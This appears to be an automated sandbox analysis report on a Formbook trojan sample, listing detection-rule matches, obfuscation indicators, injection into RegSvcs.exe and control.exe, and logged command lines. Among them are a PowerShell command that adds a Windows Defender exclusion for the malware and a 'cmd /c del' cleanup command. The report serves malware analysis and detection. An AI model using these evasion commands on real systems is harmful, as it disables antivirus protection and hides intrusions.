Source: Process Memory Space: RegSvcs.exe PID: 7708, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 7956, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: z2______________________________.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, d5r1LH1x0hBaCgY5CD.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, d5r1LH1x0hBaCgY5CD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, d5r1LH1x0hBaCgY5CD.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, d5r1LH1x0hBaCgY5CD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	Security API names: _0020.SetAccessControl
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	Security API names: _0020.AddAccessRule
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	Security API names: _0020.SetAccessControl
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	Security API names: _0020.AddAccessRule
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, d5r1LH1x0hBaCgY5CD.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, d5r1LH1x0hBaCgY5CD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	Security API names: _0020.SetAccessControl
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.evad.winEXE@14/6@12/5

Source: C:\Users\user\Desktop\z2______________________________.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z2______________________________.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\z2______________________________.exe	Mutant created: \Sessions\1\BaseNamedObjects\GwxyBIl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njr35n0a.uec.ps1

Jump to behavior

Source: z2______________________________.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: z2______________________________.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\z2______________________________.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\z2______________________________.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: z2______________________________.exe	ReversingLabs: Detection: 55%
Source: z2______________________________.exe	Virustotal: Detection: 63%

Source: C:\Users\user\Desktop\z2______________________________.exe

File read: C:\Users\user\Desktop\z2______________________________.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\z2______________________________.exe C:\Users\user\Desktop\z2______________________________.exe
Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe
Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\z2______________________________.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\z2______________________________.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Jump to behavior

Source: z2______________________________.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: z2______________________________.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 00000006.00000002.4111127345.000000001121F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4099418999.000000000309B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000535F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: control.pdb source: RegSvcs.exe, 00000005.00000002.1730241284.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1727822863.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099237458.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1729617014.0000000004C61000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000003.1727198042.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000003.1729617014.0000000004C61000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000003.1727198042.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: RegSvcs.exe, 00000005.00000002.1730241284.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1727822863.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099237458.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 00000006.00000002.4111127345.000000001121F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4099418999.000000000309B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000535F000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	.Net Code: mcMSNm8JK1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.z2______________________________.exe.26f3450.11.raw.unpack, Architectural.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	.Net Code: mcMSNm8JK1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.z2______________________________.exe.2842900.3.raw.unpack, Architectural.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.z2______________________________.exe.291dea0.4.raw.unpack, Architectural.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	.Net Code: mcMSNm8JK1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.z2______________________________.exe.26d4fbc.12.raw.unpack, Architectural.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004169CB pushad ; retf	5_2_004169CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00407A0B push cs; retf	5_2_00407A0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0040E329 push eax; iretd	5_2_0040E32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00409BCC push es; iretd	5_2_00409BCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041D3A3 push ss; iretd	5_2_0041D3A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00416C49 push ebp; retf	5_2_00416C56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0040B4C7 push edx; retf	5_2_0040B4CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041D4F2 push eax; ret	5_2_0041D4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041D4FB push eax; ret	5_2_0041D562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041D4A5 push eax; ret	5_2_0041D4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041D55C push eax; ret	5_2_0041D562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004166D8 push ebp; iretd	5_2_004166E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00407710 push edi; ret	5_2_00407711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004177F3 push eax; iretd	5_2_00417802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0196225F pushad ; ret	5_2_019627F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019627FA pushad ; ret	5_2_019627F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019909AD push ecx; mov dword ptr [esp], ecx	5_2_019909B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0196283D push eax; iretd	5_2_01962858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01961368 push eax; iretd	5_2_01961369
Source: C:\Windows\explorer.exe	Code function: 6_2_0F38DB1E push esp; retn 0000h	6_2_0F38DB1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0F38DB02 push esp; retn 0000h	6_2_0F38DB03
Source: C:\Windows\explorer.exe	Code function: 6_2_0F38D9B5 push esp; retn 0000h	6_2_0F38DAE7
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9889B5 push esp; retn 0000h	6_2_0F988AE7
Source: C:\Windows\explorer.exe	Code function: 6_2_0F988B1E push esp; retn 0000h	6_2_0F988B1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0F988B02 push esp; retn 0000h	6_2_0F988B03
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E127FA pushad ; ret	8_2_04E127F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1225F pushad ; ret	8_2_04E127F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1283D push eax; iretd	8_2_04E12858
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E409AD push ecx; mov dword ptr [esp], ecx	8_2_04E409B6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CCE329 push eax; iretd	8_2_00CCE32A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CD66D8 push ebp; iretd	8_2_00CD66E5

Source: z2______________________________.exe

Static PE information: section name: .text entropy: 7.959872783372705

Source: 0.2.z2______________________________.exe.298bef4.6.raw.unpack, ReactionVessel.cs	High entropy of concatenated method names: 'CopyMemory', 'SearchResult', 'CausalitySource', 'K4oTsswVn', 'ComputeReaction', 'ResizeVessel', 'Inject', 'c6vkj3brm', 'Init', 'Init'
Source: 0.2.z2______________________________.exe.5d90000.17.raw.unpack, ReactionVessel.cs	High entropy of concatenated method names: 'CopyMemory', 'SearchResult', 'CausalitySource', 'K4oTsswVn', 'ComputeReaction', 'ResizeVessel', 'Inject', 'c6vkj3brm', 'Init', 'Init'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, G8OFA5sukF1vCVi9WC.cs	High entropy of concatenated method names: 'vTMNW5ebh', 'TN2U90aOa', 'TX0PE3SCd', 'rebXANQHg', 'pPQvedBtH', 'XQgTBaXko', 'Su2luaWn2Bx8rveNXE', 'f29IWH5bUZW32ED4ed', 'X9bYRG4Kh', 'wUHcg9miH'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	High entropy of concatenated method names: 'BiTZCK5C1q', 's5rZpkOJhO', 'J77ZdI8eB3', 'b5HZy4t0cC', 'BOTZt7S1Sw', 'CiZZlxA3Gj', 'uFQZQbdfNM', 'Lg9ZGe6njv', 'sabZ8VWEOl', 'vuhZBlopaQ'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, FaD8oe00jFa8soDdp8.cs	High entropy of concatenated method names: 'gkhYoUYk1l', 'nyfYEspc6u', 'N0FYwW4o59', 'O8yYKSgQTC', 'oAPYDEi9Fk', 'dG2YRZE33b', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, d5r1LH1x0hBaCgY5CD.cs	High entropy of concatenated method names: 'HxadDFgY8K', 'TTGdjptJr4', 'mSbdMMlXwZ', 'wF3dnFZ4hr', 'yfrdFiFiiK', 'J9ddV94xup', 'EV6d4fi3gd', 'b1TdkFgBrm', 'sP7d0cKZ2o', 'otgdHTrFF7'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, d2y1YOqfRGIC0uhywc.cs	High entropy of concatenated method names: 'xcpQ6wgQAQ', 'hedQ7rXY0P', 'ykpQNYCRXd', 'eYJQU7n54r', 'biEQWicZjn', 'cXqQPRtldT', 'bMZQXsJJVk', 'afsQ1dvmZH', 'HlkQvX0h9H', 'gLlQTCkslH'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, mVPqaGvmpIst4hN5Mn.cs	High entropy of concatenated method names: 'P5MyU0mw1Z', 'qJByPdeSdh', 'cIvy117aPe', 'y3tyv4wPCI', 'iyPyrU9GTF', 'EJYy2vSJy2', 'LTpyAQTnh9', 'Ji3yYT1NBU', 'kssyJPIXSw', 'Gg7ycH2vJv'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, U2r9OASa6ZcD1gNPjc.cs	High entropy of concatenated method names: 'LNSiQ5r1LH', 'Q0hiGBaCgY', 'kmpiBIst4h', 'z5Mi3nPAAd', 'Vv0iryuLX1', 'LXfi2yLuTk', 'iQTy38RgrIJShb50vc', 'TkgAKZiaABsEKWdo1G', 'hNAiidwZP5', 'qMEiZVHW8c'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, CAAdpkTVgrUfVVv0yu.cs	High entropy of concatenated method names: 'B3ntWYfHkn', 'd7TtXaIt9d', 't3Cyw8WWkQ', 'dLvyKJ9qIf', 'snhyRssUXR', 'IIbyu8Epwe', 'sEFyOUtjWf', 'f4wyISloxP', 'UNJyqstaTj', 'xQMyasCsAf'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, keZjQGOi8rMWq63Y8X.cs	High entropy of concatenated method names: 'hiCQpjVNUD', 'yjQQyiYuoT', 'v4sQl4BMCE', 'qdYlHOlSuq', 'BpklzQxFef', 'Li0QeTMySl', 'UqBQiy81Ec', 'GLZQsm1y8f', 'GN2QZm7rOu', 'V8hQSMoAqW'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, ynFQCcMOTX8D5OZUNM.cs	High entropy of concatenated method names: 'ToString', 'itD2gtK6SG', 'rWI2EV1Khr', 'k012wlUpxp', 'Rgx2KkIb23', 'g3H2R9kxso', 'TqS2uaHR1e', 'A3k2O8A6J0', 'DQd2I9twmW', 'sJo2qeKVQg'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, ItCGf5knJDv8kgt0OA.cs	High entropy of concatenated method names: 'mEcYp7yjjc', 'jPfYd1GUZy', 'T9gYykK1XZ', 'CCNYtYTwKN', 'wT3YlONy3w', 'SmsYQgUmeX', 'gZTYGiwRKG', 'At0Y8y85UT', 'hAPYBLCdtK', 'SCEY3LsTxY'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, DuogO1VFcWjFnVhAIv.cs	High entropy of concatenated method names: 'PdZAkPxEeq', 'zJ5AHiZQiU', 'uOYYeqivm7', 'F3iYi71KeU', 'rwqAgDqikS', 'vpYA966JeD', 'LeIAxKG9D2', 'u21ADqSuLS', 'kG1AjoSHvq', 'JjkAMXvKTD'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, uX1IXfoyLuTkBo2Eop.cs	High entropy of concatenated method names: 'dUDlCLtgW6', 'lNLldBwkjW', 'xGalt1NFnO', 'vtElQiK1HT', 'Y0QlGjQyA0', 'snwtFg3vBG', 'zBRtVTxOg7', 'RfEt4XidPh', 'm2vtkoPZ0N', 'jRnt09d5f4'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, gwuolNieyyZJ4Se9Qu4.cs	High entropy of concatenated method names: 'RVlJ6D4uMX', 'qXiJ7vWZMu', 'anhJNQgZGP', 'ufEJUClyuv', 'QabJWEnVo6', 'CyLJPkJovL', 'bmwJX2uSTc', 'uGeJ10X9iL', 'kbJJvximeb', 'qq3JTBqry3'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, JGEvZAxvPBk7be5uHY.cs	High entropy of concatenated method names: 'vMw51FnSEL', 'J6K5vtR4Dd', 'LaQ5oGZ8DZ', 'Yp05Ec5mny', 'RiM5K32c95', 'nbX5RavOIu', 'M0K5OLMFR2', 'VU45IusrvW', 'Lky5aWqnpi', 'JXD5gnwQWr'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, QqrAThnRL5Zxw4EbaO.cs	High entropy of concatenated method names: 'QEiABbbK0e', 'I5lA3T5Jkn', 'ToString', 'W15ApOZOHW', 'SkJAd5FgR6', 'PSOAymm2PH', 'I26AtMRpYw', 'eFeAlXH6VK', 'HVKAQVICHj', 'mANAGajSBT'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, Eao4Zdz7jKD7O9JiUQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pACJ5LBatt', 'DuJJrMaffp', 'IZXJ2Dp8jF', 'HASJAkB8Mf', 'hseJYEMmRY', 'o26JJhqOLV', 'IodJcrRJDu'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, cHORWud2lBUABnYAU8.cs	High entropy of concatenated method names: 'Dispose', 'Joai0ZXNC1', 'halsEyo9bB', 'RHejj6yZkV', 'IwtiHCGf5n', 'sDviz8kgt0', 'ProcessDialogKey', 'KATseaD8oe', 'YjFsia8soD', 'gp8ssai1S5'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, WIUfHcD8WWKeWIy9Mj.cs	High entropy of concatenated method names: 'JTbra4RlJs', 'z6Br9rRodt', 'qN5rDufTC8', 'yFCrjRG19Y', 'IBxrEdn7n0', 'pvTrwjsPDb', 'gaKrKVYxHH', 'K5orR4crMg', 'w3Frufxfhe', 'bGsrOwFqWW'
Source: 0.2.z2______________________________.exe.7450000.18.raw.unpack, Ni1S5kHhuk46Mnb7Vr.cs	High entropy of concatenated method names: 'UrPJi5kXBr', 'tUWJZI9nsq', 'UoWJSMYYxt', 'ydeJpxkyIB', 'sEBJd4vfQ0', 'F52JtS318A', 'iBLJljHAOW', 'ok0Y4veeMS', 'KA6YkvpjJe', 'KUjY0ymyEb'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, G8OFA5sukF1vCVi9WC.cs	High entropy of concatenated method names: 'vTMNW5ebh', 'TN2U90aOa', 'TX0PE3SCd', 'rebXANQHg', 'pPQvedBtH', 'XQgTBaXko', 'Su2luaWn2Bx8rveNXE', 'f29IWH5bUZW32ED4ed', 'X9bYRG4Kh', 'wUHcg9miH'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	High entropy of concatenated method names: 'BiTZCK5C1q', 's5rZpkOJhO', 'J77ZdI8eB3', 'b5HZy4t0cC', 'BOTZt7S1Sw', 'CiZZlxA3Gj', 'uFQZQbdfNM', 'Lg9ZGe6njv', 'sabZ8VWEOl', 'vuhZBlopaQ'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, FaD8oe00jFa8soDdp8.cs	High entropy of concatenated method names: 'gkhYoUYk1l', 'nyfYEspc6u', 'N0FYwW4o59', 'O8yYKSgQTC', 'oAPYDEi9Fk', 'dG2YRZE33b', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, d5r1LH1x0hBaCgY5CD.cs	High entropy of concatenated method names: 'HxadDFgY8K', 'TTGdjptJr4', 'mSbdMMlXwZ', 'wF3dnFZ4hr', 'yfrdFiFiiK', 'J9ddV94xup', 'EV6d4fi3gd', 'b1TdkFgBrm', 'sP7d0cKZ2o', 'otgdHTrFF7'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, d2y1YOqfRGIC0uhywc.cs	High entropy of concatenated method names: 'xcpQ6wgQAQ', 'hedQ7rXY0P', 'ykpQNYCRXd', 'eYJQU7n54r', 'biEQWicZjn', 'cXqQPRtldT', 'bMZQXsJJVk', 'afsQ1dvmZH', 'HlkQvX0h9H', 'gLlQTCkslH'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, mVPqaGvmpIst4hN5Mn.cs	High entropy of concatenated method names: 'P5MyU0mw1Z', 'qJByPdeSdh', 'cIvy117aPe', 'y3tyv4wPCI', 'iyPyrU9GTF', 'EJYy2vSJy2', 'LTpyAQTnh9', 'Ji3yYT1NBU', 'kssyJPIXSw', 'Gg7ycH2vJv'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, U2r9OASa6ZcD1gNPjc.cs	High entropy of concatenated method names: 'LNSiQ5r1LH', 'Q0hiGBaCgY', 'kmpiBIst4h', 'z5Mi3nPAAd', 'Vv0iryuLX1', 'LXfi2yLuTk', 'iQTy38RgrIJShb50vc', 'TkgAKZiaABsEKWdo1G', 'hNAiidwZP5', 'qMEiZVHW8c'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, CAAdpkTVgrUfVVv0yu.cs	High entropy of concatenated method names: 'B3ntWYfHkn', 'd7TtXaIt9d', 't3Cyw8WWkQ', 'dLvyKJ9qIf', 'snhyRssUXR', 'IIbyu8Epwe', 'sEFyOUtjWf', 'f4wyISloxP', 'UNJyqstaTj', 'xQMyasCsAf'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, keZjQGOi8rMWq63Y8X.cs	High entropy of concatenated method names: 'hiCQpjVNUD', 'yjQQyiYuoT', 'v4sQl4BMCE', 'qdYlHOlSuq', 'BpklzQxFef', 'Li0QeTMySl', 'UqBQiy81Ec', 'GLZQsm1y8f', 'GN2QZm7rOu', 'V8hQSMoAqW'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, ynFQCcMOTX8D5OZUNM.cs	High entropy of concatenated method names: 'ToString', 'itD2gtK6SG', 'rWI2EV1Khr', 'k012wlUpxp', 'Rgx2KkIb23', 'g3H2R9kxso', 'TqS2uaHR1e', 'A3k2O8A6J0', 'DQd2I9twmW', 'sJo2qeKVQg'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, ItCGf5knJDv8kgt0OA.cs	High entropy of concatenated method names: 'mEcYp7yjjc', 'jPfYd1GUZy', 'T9gYykK1XZ', 'CCNYtYTwKN', 'wT3YlONy3w', 'SmsYQgUmeX', 'gZTYGiwRKG', 'At0Y8y85UT', 'hAPYBLCdtK', 'SCEY3LsTxY'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, DuogO1VFcWjFnVhAIv.cs	High entropy of concatenated method names: 'PdZAkPxEeq', 'zJ5AHiZQiU', 'uOYYeqivm7', 'F3iYi71KeU', 'rwqAgDqikS', 'vpYA966JeD', 'LeIAxKG9D2', 'u21ADqSuLS', 'kG1AjoSHvq', 'JjkAMXvKTD'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, uX1IXfoyLuTkBo2Eop.cs	High entropy of concatenated method names: 'dUDlCLtgW6', 'lNLldBwkjW', 'xGalt1NFnO', 'vtElQiK1HT', 'Y0QlGjQyA0', 'snwtFg3vBG', 'zBRtVTxOg7', 'RfEt4XidPh', 'm2vtkoPZ0N', 'jRnt09d5f4'
